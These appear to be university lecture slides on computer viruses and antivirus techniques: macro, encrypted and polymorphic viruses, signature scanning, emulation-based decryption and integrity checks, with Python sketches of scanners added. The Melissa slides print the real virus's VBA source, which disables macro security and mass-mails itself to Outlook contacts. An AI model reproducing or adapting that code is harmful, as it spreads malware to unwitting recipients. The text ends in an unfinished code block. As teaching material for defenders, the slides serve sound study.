
  • CSE 127: Computer Security

    Spring 2009. Malware I: Viruses and virus-defense

    Stefan Savage. Many slides courtesy Carey Nachenberg

  • Recap
    - Various ways to compromise software systems based on input and timing
      - Buffer overflows, format string errors, TOCTOU, SQL injection, XSS, etc.
    - But once you've compromised a system, what does the malicious software do?

    First: it propagates itself to create an installed base

    Today: viruses, the oldest mass malware

  • Reminder
    - You have a project due on Tuesday

  • Viruses
    - A computer virus is a (malicious) program that
      - Attaches to a host program or data
      - Creates (possibly modified) copies of itself
    - The payload of the program may have other effects (deleting files, opening backdoors, printing messages, etc.)

    Viruses traditionally require some user action to activate (e.g. executing a file, opening a spreadsheet)

  • Virus Writer's Goals
    - Hard to detect
    - Hard to destroy or deactivate
    - Spreads infection widely/quickly
    - Can reinfect a host
    - Easy to create

  • Kinds of Viruses
    - Boot Sector Viruses
      - Historically important, but less common today
    - Memory Resident Viruses
      - Standard infected executable
    - Macro Viruses
      - Embedded in documents (like Word docs)
    - E-mail/IM Viruses
      - Spread via attachments
    - Web platform viruses
      - Spread on Web sites (e.g. social network applications)

  • Boot sector Viruses (old school)
    - Bootstrap Process:
      - Firmware (ROM) copies the MBR (master boot record) to memory and jumps to that program
    - MBR (or Boot Sector)
      - Fixed position on disk
      - Chained boot sectors permit longer Bootstrap Loaders

    Diagram: MBR -> boot -> boot

  • Boot sector Viruses
    - Virus breaks the chain
    - Inserts virus code
    - Reconnects the chain afterwards

    Diagram: MBR, boot, boot, with the virus inserted into the chain

  • Why attack the Bootstrap?
    - Automatically executed before the OS is running
      - And thus, before detection tools are running
    - OS hides boot sector information from users
      - Hard to discover that the virus is there
      - Harder to fix

    - Any good virus scanning software scans the boot sectors
      - But good boot sector viruses may restore the good boot sector during normal operation (and replace it when you log out or when anti-virus software isn't running)
    - Boot sector malware is back with a vengeance (Mebroot/Sinowal)

  • Virus Attachment to Host Code
    - Simplest case: insert a copy at the beginning of an executable file
      - Runs before other code of the program
      - Historically the most common program virus
    - Runs before & after the original program
      - Virus can clean up after itself
    - Virus could modify code in place
      - Doesn't change size, but could change behavior
      - Maybe harder to detect?

    Diagram: Original Program, Modified Program

  • Other virus tricks
    - Entry-point obscuring viruses
      - Virus takes control in the middle of the program (random code point) and is harder to scan for
    - Polymorphic viruses
      - Virus encrypts its body with a random key in each generation
    - Metamorphic viruses
      - Virus rewrites itself in each generation (semantically equivalent, but different instruction stream)
      - Instruction substitution, control flow rewriting, etc.

  • Other Homes for Viruses
    - System Software
      - IO.sys, NTLDR, NTDETECT.COM
      - autoexec.bat, config.sys, command.com

    - Memory resident software
      - Task manager
      - Window manager
      - Winamp
      - RealPlayer

  • Macro Viruses
    - Many applications support Macros
      - Macros are just programs
    - Word processors & Spreadsheets
      - Startup macro
      - Macros turned on by default

    - Visual Basic Script (VBScript)

  • Melissa Macro Virus
    - Implementation
      - VBA (Visual Basic for Applications) code associated with the "document.open" method of Word

    - Strategy
      - Email message containing an infected Word document as an attachment (social engineering)
      - Opening the Word document triggers the virus if macros are enabled
      - Under certain conditions included attached documents created by the victim

  • Melissa Macro Virus: Behavior
    - Setup
      - Lowers the macro security settings
        - Permits all macros to run without warning
      - Checks the registry for the key value "... by Kwyjibo"
        - HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

    - Propagation
      - Sends an email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

  • Melissa Macro Virus: Behavior
    - Propagation, continued
      - Infects the Normal.dot template file
      - Normal.dot is used by all Word documents

    - Joke
      - If the minute matches the day of the month, the macro inserts the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

  • **// Melissa Virus Source Code

    Private Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

  • If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " &Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next yDasMapiName.LogoffEnd If

  • Melissa Virus
    - Transmission Rate
      - The first confirmed reports of Melissa were received on Friday, March 26, 1999.
      - By Monday, March 29, it had reached more than 100,000 computers.
      - One site got 32,000 infected messages in 45 minutes.
    - Damage
      - Denial of service: mail systems off-line.
      - Could have been much worse
    - Remedy
      - Filter mail for the virus signature (macro in .doc files)
      - Don't run macros in unknown documents by default
      - Clean Normal.dot

  • Detecting Viruses
    - Scanning
    - Integrity checking
    - Heuristic detection

  • Virus Signatures
    - Viruses can't be completely invisible:
      - Code must be stored somewhere
      - Virus must do something when it runs
    - Idea: look in files for signature byte sequences that are unique to the virus
    - Issues
      - Where to scan (beginning of file, whole file, registry settings, etc.)
      - How to scan (look for the ILOVEYOU string, or actually execute the program)
      - How long to scan (tradeoffs in performance/coverage)
      - How to distinguish polymorphs (research issue)
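The signature idea above can be sketched in a few lines of Python. This is a minimal illustration, not how any real product works: the signature names (`Demo.A`, `Demo.B`) and the choice of byte sequences are assumptions made up for the example, and the scan is a plain whole-buffer substring search.

```python
# Hypothetical signature database: name -> byte sequence (invented for illustration).
SIGNATURES = {
    "Demo.A": bytes.fromhex("b435b021cd21"),  # MOV AH,35 / MOV AL,21 / INT 21
    "Demo.B": b"ILOVEYOU",
}


def scan_bytes(data: bytes, signatures=SIGNATURES):
    """Return a sorted list of (offset, name) for every signature occurrence."""
    hits = []
    for name, pattern in signatures.items():
        start = data.find(pattern)
        while start != -1:
            hits.append((start, name))
            start = data.find(pattern, start + 1)
    return sorted(hits)


# Two filler bytes, then the first signature, then the string signature.
sample = b"\x90\x90" + bytes.fromhex("b435b021cd21") + b"...ILOVEYOU..."
print(scan_bytes(sample))
```

Scanning the whole buffer is the simplest answer to "where to scan"; the later slides are about avoiding exactly this cost.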

  • The Simple Virus
    1. User runs an infected program.
    2. Program transfers control to the virus.
    3. Virus locates a new program.
    5. Virus updates the new program so the virus gets control when the program is launched.

      0100 B435       MOV AH,35
      0102 B021       MOV AL,21
      0104 CD21       INT 21
      0106 8C06A002   MOV [02A0],ES
      010A 891E9E02   MOV [029E],BX
      010E B425       MOV AH,25
      0110 B021       MOV AL,21
      0112 BA2001     MOV DX,0120
      0115 CD21       INT 21

      0117 83C24F     ADD DX,+4F
      011A 8BFA       MOV DI,DX
      011C 81FF8000   CMP DI,0080
      0120 725E       JB 0187
      0122 7406       JZ 0131
      0124 C606250273 MOV BYTE PTR [0225],73
      0129 90         NOP
      012A FEC5       INC CH
      012C 7303       JNB 0138
      012E 80C140     ADD CL,40
      0132 B8010C     MOV AX,0C01
      0135 8BD6       MOV DX,SI
      0137 CD13       INT 13

  • Head/Tail Scanners
    - Most of these application-infecting viruses attached themselves to either the top or the bottom of the host file.
    - So anti-virus engineers built head/tail scanners.
    - The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm.

    Diagram: Virus + Host (virus at the top), Host + Virus (virus at the bottom)
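A head/tail scanner can be sketched as follows. The function name `head_tail_scan`, the `window` parameter, and the signature dictionary are assumptions for illustration; the per-pattern `in` test stands in for the multi-string search algorithm the slide mentions (a real scanner would more likely use something like Aho-Corasick).

```python
import io


def head_tail_scan(stream, signatures, window=4096):
    """Scan only the first and last `window` bytes of a seekable binary stream.

    Returns the set of signature names found in either region.
    """
    size = stream.seek(0, io.SEEK_END)
    stream.seek(0)
    if size <= 2 * window:
        # Small file: head and tail would overlap, so scan it as one buffer.
        buffers = [stream.read()]
    else:
        head = stream.read(window)
        stream.seek(size - window)
        buffers = [head, stream.read(window)]
    return {
        name
        for name, pattern in signatures.items()
        if any(pattern in buf for buf in buffers)
    }


sigs = {"Demo": b"VIRUSBODY"}  # hypothetical signature
appended = io.BytesIO(b"\x00" * 10000 + b"VIRUSBODY")
middle = io.BytesIO(b"\x00" * 5000 + b"VIRUSBODY" + b"\x00" * 5000)
print(head_tail_scan(appended, sigs, window=1024))  # found in the tail
print(head_tail_scan(middle, sigs, window=1024))    # missed: body is mid-file
```

The second call shows the weakness the next slide exploits: a body placed in the middle of the file falls outside both windows.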

  • So what do the bad guys do?
    - Move the virus to the middle of the file
      - Becomes prohibitively expensive to scan
      - Must scan the whole file

    - Solution: scalpel scanning
      - Idea: limit scanning to likely entry-points for viruses
      - If you have more time you can also scan for more than just strings (regular expressions)

  • Scalpel Scanning
    - Locate the main program entry-point.
    - While the current instruction is a JUMP or a CALL instruction, trace it.
    - If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file.

      0100 EB04       JMP 106
      0102 B021       MOV AL,21
      0104 CD21       INT 21
      0106 EB09       JMP 112
      0108 B404       MOV AH, 04
      010A 891E9E02   MOV [029E],BX
      010E B425       MOV AH,25
      0110 B021       MOV AL,21
      0112 E90200     JMP 117
      0115 CD21       INT 21

      0117 83C24F     ADD DX,+4F
      011A 8BFA       MOV DI,DX
      011C 81FF8000   CMP DI,0080
      0120 725E       JB 0187
      0122 7406       JZ 0131
      0124 C606250273 MOV BYTE PTR [0225],73
      0129 90         NOP
      012A FEC5       INC CH
      012C 7303       JNB 0138
      012E 80C140     ADD CL,40
      0132 B8010C     MOV AX,0C01
      0135 8BD6       MOV DX,SI
      0137 CD13       INT 13
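The three scalpel-scanning steps can be sketched on a toy flat image. Everything here is a simplifying assumption: the image is loaded at `0x100` as in the slide listings, only three x86 opcodes are decoded (`EB` short JMP, `E9` near JMP, `E8` near CALL), and the names `trace_entry`, `scalpel_scan`, and `region` are invented for the example.

```python
import struct

BASE = 0x100  # assumed load address, matching the slide listings


def trace_entry(image: bytes, entry: int = BASE, max_hops: int = 64) -> int:
    """Follow JMP/CALL instructions from the entry point; return the final address."""
    ip = entry
    for _ in range(max_hops):  # hop limit guards against jump loops
        off = ip - BASE
        if not 0 <= off < len(image):
            break
        op = image[off]
        if op == 0xEB and off + 2 <= len(image):  # JMP rel8
            (rel,) = struct.unpack_from("<b", image, off + 1)
            ip = (ip + 2 + rel) & 0xFFFF
        elif op in (0xE9, 0xE8) and off + 3 <= len(image):  # JMP/CALL rel16
            (rel,) = struct.unpack_from("<h", image, off + 1)
            ip = (ip + 3 + rel) & 0xFFFF
        else:
            break  # not a jump or call: this is where scanning starts
    return ip


def scalpel_scan(image: bytes, signatures, region: int = 64):
    """Search for fingerprints only in `region` bytes after the traced entry point."""
    start = trace_entry(image) - BASE
    if not 0 <= start < len(image):
        return []
    window = image[start:start + region]
    return [name for name, pattern in signatures.items() if pattern in window]


# JMP 0x106, filler, JMP 0x10B, filler, then the bytes we treat as a fingerprint.
image = (bytes.fromhex("eb04") + b"\x90" * 4 + bytes.fromhex("e90200")
         + b"\x90" * 2 + bytes.fromhex("83c24f8bfa") + b"\x00" * 200)
print(hex(trace_entry(image)))
print(scalpel_scan(image, {"Demo": bytes.fromhex("83c24f8bfa")}))
```

A real tracer would need a full instruction decoder and would have to decide what to do with conditional and indirect branches; the sketch ignores both.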

  • The Encrypted Virus
    - Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains.
    - These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus.
    - Each time the virus infects a new file, it changes the encryption key so the virus body looks different.

  • The Encrypted Virus
    - The decryption routine stays the same. Only the key(s) change.
    - The encrypted body changes.
    - Still easy to detect because the decryption loop stays the same.

    One infection (key 5132h):

      MOV DI, 120h
      MOV AX, [DI]
      XOR AX, 5132h
      MOV [DI], AX
      ADD DI, 2h
      CMP DI, 2500h
      JNE 3
      8. WJSVTPBMZPL
      9. NAADJGNANW...

    Another infection (key 0030h):

      MOV DI, 120h
      MOV AX, [DI]
      XOR AX, 0030h
      MOV [DI], AX
      ADD DI, 2h
      CMP DI, 2500h
      JNE 3
      8. PKEPAJHENZAW
      9. MNANTPOOTIZN...
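To see why a body signature fails against this scheme while the loop itself stays detectable, here is a small sketch of the word-wise XOR transform from the listings, applied to a harmless placeholder string. The helper name `xor_words` and the placeholder body are assumptions; only the two key values come from the slide.

```python
def xor_words(body: bytes, key: int) -> bytes:
    """XOR each 16-bit little-endian word of `body` with `key`.

    XOR is its own inverse, so the same call both encrypts and decrypts.
    """
    if len(body) % 2:
        raise ValueError("body length must be a multiple of 2")
    out = bytearray()
    for i in range(0, len(body), 2):
        word = int.from_bytes(body[i:i + 2], "little") ^ key
        out += word.to_bytes(2, "little")
    return bytes(out)


body = b"HARMLESS DEMO BODY!!"      # placeholder for the static body (20 bytes)
gen1 = xor_words(body, 0x5132)      # key from the first listing
gen2 = xor_words(body, 0x0030)      # key from the second listing

print(gen1 != gen2)                 # the stored bytes differ between infections
print(b"HARMLESS" in gen1, b"HARMLESS" in gen2)
print(xor_words(gen1, 0x5132) == body)
```

A string signature taken from the plaintext body matches neither generation, which is why scanners of that era fingerprinted the unchanging decryption loop instead.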

  • The Polymorphic Virus
    - Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm

    - When infecting a new file, such a virus:
      - Generates brand-new decryption code from scratch
      - Encrypts a copy of itself using a complementary encryption algorithm
      - Inserts both the new decryption code and the encrypted body of the virus into the target file

  • The Polymorphic Virus (animation: Host Program and its Decryption Loop on disk, a copy in RAM, and a new Host Program)
    1. User executes program.
    2. Virus decrypts itself.
    3. Virus finds a new program.
    4. Mutation engine creates a new decryptor.
    5. Virus makes a new copy of itself and encrypts this copy.

    And we have a new infection!

  • The Polymorphic Virus
    Here we have a decryption loop from an MtE-based virus infection.

      Addr Machine Code Mnemonic
      0100 50           PUSH AX
      0101 B8347E       MOV AX,7E34
      0104 25A907       AND AX,07A9
      0107 95           XCHG BP,AX
      0108 B840B2       MOV AX,B240
      010B BABBB8       MOV DX,B8BB
      010E F7EA         IMUL DX
      0110 93           XCHG BX,AX
      0111 B8B4D2       MOV AX,D2B4
      0114 03C3         ADD AX,BX
      0116 2BC5         SUB AX,BP
      0118 BA479A       MOV DX,9A47
      011B F7E2         MUL DX
      011D 95           XCHG BP,AX
      011E B809F4       MOV AX,F409
      0121 2BC5         SUB AX,BP
      0123 91           XCHG CX,AX
      0124 B8AB6A       MOV AX,6AAB
      0127 BA972C       MOV DX,2C97
      012A F7E2         MUL DX
      012C D1C0         ROL AX,1
      012E 80E11F       AND CL,1F
      0131 D3E0         SHL AX,CL
      0133 91           XCHG CX,AX
      0134 B8E1CE       MOV AX,CEE1
      0137 03C1         ADD AX,CX
      0139 93           XCHG BX,AX
      013A B84A43       MOV AX,434A
      013D 29C3         SUB BX,AX
      013F F7DB         NEG BX
      0141 8B86381B     MOV AX,[BP+1B38]
      0145 8ACB         MOV CL,BL
      0147 D3C8         ROR AX,CL
      0149 2D23C9       SUB AX,C923
      014C B108         MOV CL,08
      014E D3C8         ROR AX,CL
      0150 8786381B     XCHG AX,[BP+1B38]
      0154 B80765       MOV AX,6507
      0157 BA55B3       MOV DX,B355
      015A F7E2         MUL DX
      015C 96           XCHG SI,AX
      015D 8BC5         MOV AX,BP
      015F 2BC6         SUB AX,SI
      0161 BAE337       MOV DX,37E3
      0164 F7E2         MUL DX
      0166 96           XCHG SI,AX
      0167 B80765       MOV AX,6507
      016A BA55B3       MOV DX,B355
      016D F7E2         MUL DX
      016F 91           XCHG CX,AX
      0170 8BC6         MOV AX,SI
      0172 BACBC5       MOV DX,C5CB
      0175 F7E2         MUL DX
      0177 03C1         ADD AX,CX
      0179 95           XCHG BP,AX
      017A 45           INC BP
      017B 45           INC BP
      017C 75A0         JNZ 011E

    And here's a second generation decryption loop of the same virus strain.

  • Detecting The Polymorphic Virus
    So how do we detect such a beast?

    1. Use lots of wildcard strings/scripts:

      B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2
      B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2
      B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2
      B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2
      B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2
      B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2

      - The number of strings (alg. sigs) explodes quickly!
      - Detecting the decryption loop is prone to false positives!

    2. X-ray techniques (plaintext attack on the encrypted virus body)
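Wildcard signatures like the ones above can be matched by translating them into regular expressions over bytes. The slide does not define its notation, so the reading used here is an assumption: two hex digits are a literal byte, `??` is exactly one arbitrary byte, and `%N` (one hex digit) skips between 0 and N arbitrary bytes. The function name `compile_signature` is also made up for the sketch.

```python
import re


def compile_signature(sig: str):
    """Translate a wildcard signature string into a compiled bytes regex.

    Assumed notation: 'HH' literal byte, '??' any one byte, '%N' skip 0..N bytes.
    """
    parts = []
    i = 0
    while i < len(sig):
        if sig[i] == "%":                       # %N: skip 0..N arbitrary bytes
            parts.append(b".{0,%d}" % int(sig[i + 1], 16))
        elif sig[i:i + 2] == "??":              # ??: exactly one arbitrary byte
            parts.append(b".")
        else:                                   # literal hex byte
            parts.append(re.escape(bytes.fromhex(sig[i:i + 2])))
        i += 2
    return re.compile(b"".join(parts), re.DOTALL)


# Third signature from the slide, interpreted under the assumed notation.
pattern = compile_signature("B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2")

# Hand-built byte string that fits the pattern, with two junk bytes after B98104.
candidate = bytes.fromhex("b98104" "9090" "be3412" "314405" "2dc0" "46" "83cc" "e2f0")
print(pattern.search(candidate) is not None)
print(pattern.search(b"\x00" * 64) is not None)
```

Each variable-length skip multiplies the strings a pattern accepts, which is one way to see both problems the slide names: the signature set grows quickly, and loose patterns start matching innocent code.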

  • X-ray scanning
    - Assume the file is infected and perform a plain-text attack on the encrypted virus code.
    - This only works for simple schemes (but it's often sufficient).

    Diagram: Host Program followed by an encrypted body (AMBCAPQYEQYQWERQWERQWERERGQWETWLRW); 7 bytes from EOF = VIRUS?
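For the simplest case, a single-byte XOR key, the plaintext attack can be sketched like this. The cipher choice, the function name `xray_scan`, and the marker string are assumptions for illustration; the slide only says the technique works for simple schemes.

```python
def xray_scan(data: bytes, known_plaintext: bytes):
    """Find places where `data` equals `known_plaintext` XORed with one byte key.

    For each offset, the key is derived from the first byte, then checked
    against the remaining bytes. Returns a list of (offset, key) pairs.
    """
    hits = []
    n = len(known_plaintext)
    for off in range(len(data) - n + 1):
        key = data[off] ^ known_plaintext[0]
        if all(data[off + i] ^ key == known_plaintext[i] for i in range(1, n)):
            hits.append((off, key))
    return hits


plain = b"VIRUS-BODY-MARK"                      # hypothetical known body fragment
encrypted = bytes(b ^ 0x5A for b in plain)      # what is actually stored on disk
data = b"host code" + encrypted + b"\x00"

print(xray_scan(data, plain))
```

The scanner never needs the decryption loop: knowing what the body must decrypt to is enough to recover the key and confirm the infection. Checking a fixed location, as the diagram suggests, replaces the loop over offsets with a single test.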

  • Generic Decryption
    - Invented by Alan Solomon (a.k.a. Dr. Solomon)
      - Chose the name to obscure how it worked
    - Assumptions
      - Virus gains control of the host immediately
      - Virus decrypts itself deterministically
      - Virus has some static body that can be detected with traditional signatures
    - Key idea:
      - Emulate code execution until the virus decrypts itself
      - Typically use some sort of virtual machine (VM) environment
      - Search for signatures in memory

  • Generic Decryption (animation: the program is read off disk into a Virtual Machine holding the Host Program, Decryption Loop, Mutation Engine and Virus)
    1. Load the suspected program into the VM.
    2. Allow the program to execute normally.
    3. Tag all modified memory as the program executes.
    4. Scan all modified areas of virtual memory for virus signatures.

    The decryption loop being emulated:
      1. Fetch Byte
      2. Decrypt Byte
      3. Store Byte
      4. Loop to 1
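The four generic-decryption steps can be illustrated with a toy interpreter. This is a sketch under heavy assumptions: the "VM" runs a made-up six-operation instruction set rather than x86, and the names `emulate`, `generic_decrypt_scan`, and the opcode strings are all invented for the example.

```python
def emulate(memory: bytearray, program, max_steps: int = 10_000):
    """Run a toy program against `memory`; return the set of modified addresses."""
    ptr = acc = pc = steps = 0
    modified = set()
    while pc < len(program) and steps < max_steps:
        op, arg = program[pc]
        pc += 1
        steps += 1
        if op == "set_ptr":
            ptr = arg
        elif op == "load":            # 1. fetch byte
            acc = memory[ptr]
        elif op == "xor":             # 2. decrypt byte
            acc ^= arg
        elif op == "store":           # 3. store byte, tagging the address
            memory[ptr] = acc
            modified.add(ptr)
        elif op == "inc_ptr":
            ptr += 1
        elif op == "loop_below":      # 4. loop while ptr < limit
            limit, target = arg
            if ptr < limit:
                pc = target
    return modified


def generic_decrypt_scan(memory: bytearray, program, signatures):
    """Emulate, then scan only the memory range the program wrote to."""
    modified = emulate(memory, program)
    if not modified:
        return []
    region = bytes(memory[min(modified):max(modified) + 1])
    return [name for name, pattern in signatures.items() if pattern in region]


body = b"STATIC-VIRUS-BODY"                       # harmless placeholder
memory = bytearray(b"HOSTHOST" + bytes(b ^ 0x5A for b in body))
program = [("set_ptr", 8), ("load", None), ("xor", 0x5A), ("store", None),
           ("inc_ptr", None), ("loop_below", (len(memory), 1))]
sigs = {"Demo": b"VIRUS-BODY"}

print(b"VIRUS-BODY" in bytes(memory))             # hidden before emulation
print(generic_decrypt_scan(memory, program, sigs))
```

The `max_steps` cap is the toy version of the "how long to emulate" question discussed next.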

  • Challenges with GD
    - How long to emulate the program?
      - Emulate too long and the system slows to a crawl
      - Don't emulate enough and you might miss the virus

    - Two approaches
      - Heuristic-driven emulation
        - Emulate while you see suspicious behavior
        - Unusual instruction sequences, sequence modifications of memory, etc.
        - Suffers from false positives and false negatives & can be avoided
        - Prolong execution on uninfected files
      - Profile-driven emulation

  • Profile-based Emulation
    - For each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus data files.
    - Fetch and emulate instructions from a program file as long as its instructions are consistent with at least one polymorphic virus profile.
    - When all viruses have been eliminated from consideration, cease emulation.

  • Profile-based Emulation (animation)

      Engine  Profile bits
      DSCE    1001000000..
      MtE     0111000001..
      SMEG    0001000111..

    Bit labels on the slide: ADD opcode, SUB opcode, XOR opcode, INC opcode, MOV opcode, ROL opcode, INT opcode, DEC opcode, NOP opcode, JMP opcode, ...

    In later animation frames the SMEG row reads 1001000111.., then 1001100111.., and so on, while this code is emulated:

      0100 JMP 117
      0102 MOV AL,21
      0104 INT 21
      0106 MOV [02A0],ES
      010A MOV [029E],BX
      010E MOV AH,25
      0110 MOV AL,21
      0112 MOV DX,0120
      0115 INT 21

      0117 ADD DX,+4F
      011A MOV DI,DX
      011C CMP DI,0080
      0120 JB 0187
      0122 JZ 0131
      0124 MOV BYTE PTR [0225],73
      0129 NOP

  • Profile-based Emulation
    - The profiles are specific to each polymorphic virus, limiting the search space.
    - This reduces the number of iterations required on uninfected files.

    Diagram: regions labeled Poly #1a, Poly #1b, Poly #2, Poly #3, Poly #3b, Poly #4, Poly #5
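The stopping rule of profile-based emulation can be sketched as set elimination. The engine names and opcode sets below are hypothetical (they are not the DSCE/MtE/SMEG profiles from the slide), and a list of mnemonics stands in for the instructions an emulator would fetch one at a time.

```python
# Hypothetical profiles: engine name -> mnemonics its decryptors may contain.
PROFILES = {
    "EngineA": {"MOV", "XOR", "INC", "JNZ"},
    "EngineB": {"MOV", "ADD", "SUB", "JMP"},
}


def profile_emulate(instructions, profiles=PROFILES, max_steps=1000):
    """Emulate while at least one profile is still consistent with the code.

    Returns (instructions_emulated, sorted list of surviving profile names).
    """
    candidates = set(profiles)
    steps = 0
    for mnemonic in instructions:
        if steps >= max_steps:
            break
        # Drop every profile that could not have produced this instruction.
        candidates = {name for name in candidates if mnemonic in profiles[name]}
        if not candidates:
            break  # all viruses eliminated from consideration: cease emulation
        steps += 1
    return steps, sorted(candidates)


print(profile_emulate(["MOV", "XOR", "INC", "JNZ"]))   # stays consistent with EngineA
print(profile_emulate(["MOV", "INT", "MOV", "MOV"]))   # INT rules out both profiles
```

The second call shows the intended benefit: a clean program is abandoned after its first instruction that fits no profile, so little time is spent on uninfected files.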

  • Problems
    - Time consuming to generate profiles
      - And if you get one wrong you can miss stuff
    - Lots of ways to get around GD
      - Random viruses
        - V will only run if the time is between 3 and 4pm
      - Emulator-aware viruses
        - V detects it's in an emulator and hides
      - Maxed-out iteration viruses
        - V takes too long to emulate
      - Entry-point Obscuring Viruses

  • Entry-point Obscuring Viruses
    - These viruses do not gain control at the main program entry-point.
    - Instead, they modify the host program to transfer control to the virus at some obfuscated point in the program.

    Diagram: PE file layout (MZ header, PE header, Section #1 to #4 info, code, data, .reloc)

  • What to do
    - Tailored code written to detect each strain of virus (knowledgeable about the EPO approach)
    - Typically low-level pseudo-code which evaluates the program and can invoke the emulator when necessary
    - Fast to execute but can be time-consuming to write

    - But it gets worse
      - Metamorphic viruses
      - Integrated infection

  • The Metamorphic Virus
    - These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere!
    - Metamorphic strains use the current infection's code as a template and then expand and contract sets of instructions within the body to create a child infection.

  • Integrated infection
    - Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic throughout the original logic, and reassemble.
    - Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare.

  • Summary: Modern AV programs
    - It's not grep

    - Carefully constructed dictionary of known virus signatures
      - Complex algorithmic signatures, not just strings
    - Whole-system emulator executes programs in a sandbox, scanning for signatures during execution
    - Heuristics to determine how long to emulate, when to emulate, etc.
    - Lots of tricks for speed

  • Virus Scanning: Pros & Cons
    - Pros
      - Effectively detects known viruses before they can cause harm
      - Few false alarms

    - Cons
      - Can detect only viruses with known signatures
        - Assumption is that samples can be obtained
      - Signature set must be kept up to date
        - Can take 5 minutes to identify a simple signature, days for a complex one
      - Signature set must be distributed to all clients
        - Symantec pushes 1.4B updates per day (~60TB)
      - Virus writers can easily change virus signatures
        - Packers
      - Fundamentally a reactive business

  • Inoculation
    - Most viruses use some kind of marker to identify infected files
    - Inoculation: add the marker to clean files so they won't be infected

    - Drawbacks:
      - Markerless or implicit-marker viruses (e.g. file size, checksum)
      - Lots of different markers for different viruses; need to change all files

  • Integrity Checks & whitelists
    - Virus scanner computes a hash or checksum of executable files (or downloads hashes of known good files)
      - Assumed to be virus free!
    - Stores the hash information

    - Verifies the new hash vs. the saved one during a scan
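A hash-based integrity check is short enough to sketch in full. The choice of SHA-256 and the function names `file_digest`, `build_baseline`, and `verify` are assumptions; the slide only says "hash or checksum".

```python
import hashlib
import os
import tempfile
from pathlib import Path


def file_digest(path) -> str:
    """Return the SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Record digests for files that are assumed to be virus free."""
    return {str(p): file_digest(p) for p in paths}


def verify(baseline):
    """Return the paths that are missing or whose digest no longer matches."""
    return [
        path for path, digest in baseline.items()
        if not Path(path).exists() or file_digest(path) != digest
    ]


with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "app.bin")
    Path(target).write_bytes(b"original program")
    baseline = build_baseline([target])
    print(verify(baseline))                       # nothing has changed yet
    Path(target).write_bytes(b"original program + appended code")
    print(verify(baseline) == [target])           # the modification is reported
```

The check says only that a file changed, not why, so a legitimate update trips it just like an infection would, and the baseline itself has to be stored somewhere the virus cannot rewrite.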

  • Integrity Checks: Pros & Cons
    - Pros
      - Can detect corruption of executables too
      - Reliable
      - Doesn't require virus signatures

    - Cons
      - False positives (e.g. recompilation, updates)
      - Can't use it on documents (they change too often)

  • Behavior-based Detection
    - Collection of ad hoc rules that identify virus behavior or virus-like programs
    - Unusual system call behavior
      - E.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network
      - Uncommon syscall/argument patterns from each code point
    - Modification of system executables/templates
      - Normal.dot
    - Self-modifying and self-referential code
    - Rarely used instructions or lots of NOPs
    - This is where the action was until very recently

  • Behavior-based detection: Pros & Cons
    - Pros
      - Perhaps able to detect unknown viruses

    - Cons
      - Good heuristics are hard to develop
      - Bad heuristics have too many false positives

    All major AV programs have moved to incorporate behavioral techniques

  • Disinfection
    - OK, you found a virus in a file. Now what?
    - Standard disinfection
      - The virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later
      - To clean: find the virus, find the original host file beginning, find the size of the virus. Then move the original code to the beginning, and truncate the file to eliminate the virus code
      - Specialized to each virus
    - Generic disinfection
      - Run the program and emulate until it restores the file to its normal state (so it can execute normally); let the virus itself do the tough work
      - Rewrite the cleaned program back to disk
      - Works for roughly 70% of viruses
      - Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics (when is the image clean?)
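Standard disinfection for an appending virus can be sketched on a toy layout. The layout is entirely an assumption made for the example: the virus body starts with a known marker (`MARKER`), is followed immediately by the `SAVED_LEN` original bytes it displaced from the start of the host, and everything from the marker onward is virus code. Real cleaners encode this kind of knowledge separately for each strain.

```python
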